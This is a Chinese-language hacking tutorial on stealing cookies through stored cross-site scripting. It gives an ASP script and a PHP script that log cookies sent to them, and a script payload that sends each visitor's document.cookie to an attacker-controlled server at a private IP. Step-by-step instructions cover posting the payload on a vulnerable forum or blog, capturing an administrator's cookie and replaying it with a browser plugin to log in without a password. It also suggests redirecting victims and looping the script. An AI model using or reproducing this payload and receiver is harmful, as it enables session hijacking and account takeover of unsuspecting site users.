獲取cookie利用代碼cookie.asp
<html>
<title>xx</title>
<body>
<%testfile = Server.MapPath("code.txt") //先構造一個路徑,也就是取網站根目錄,創造一個在根目錄下的code.txt路徑,保存在testfile中
msg = Request("msg") //獲取提交過來的msg變量,也就是cookie值
set fs = server.CreateObject("scripting.filesystemobject")//創建一個fs對象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")//像code.txt中寫入獲取來的cookie
thisfile.close() //關閉
set fs = nothing%>
</body>
</html>
把上述文件保存為cookie.asp文件,放到你自己的網站服務器下。比如這里我們自己搭建的服務器為:http://10.65.20.196:8080。
XSS構造語句
<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>
把上述語句放到你找到的存在XSS的目標中,不過這里最好是存儲型xss,比如你找到了某個博客或者論壇什么的存在存儲型XSS,你在里面發一篇帖子或者留上你的評論,內容就是上述語句,當其他用戶或者管理員打開這個評論或者帖子鏈接后,就會觸發,然后跳轉到http://10.65.20.196:8080/cookie.asp?msg='+document.cookie的頁面,然后當前賬戶的coolie信息就當成參數發到你的網站下的文件里了。然后的然后你就可以那這個cookie登陸了。。。。。。
簡單步驟如下:
1、在存在漏洞的論壇中發日志:
2、然后以管理遠登陸,進入后頁面會跳轉,此時cookie就發送到你的服務器下的code.txt文件中了:
3、這是沒有賬戶前的登陸界面:
4、打開firefox的Tamper Data插件,點擊Start Tamper開始抓取信息,刷新登陸界面,然后會跳出對話框,點擊Tamper按鈕,在途中的cookie一欄中替換掉你抓取到的cookie,單擊確定發送請求數據:
5、替換cookie后不用輸用戶名密碼就順利進入管理員賬戶了:
后記:
他后台我沒成功 我自己寫了個
<html>
<body>
Welcome <?php echo $_GET["msg"]; ?><br>
<?php
$myfile = fopen("/Applications/MAMP/htdocs/444/123.txt", "w") or die("Unable to open file!"); #其中 w是覆蓋寫入,改成a 是追加寫入
$txt = $_GET["msg"];
fwrite($myfile, $txt);
fclose($myfile);
?>
</body>
</html>
這里xss攻擊 可以把鏈接換成其他網站,讓別人跳過去,並用js循環100次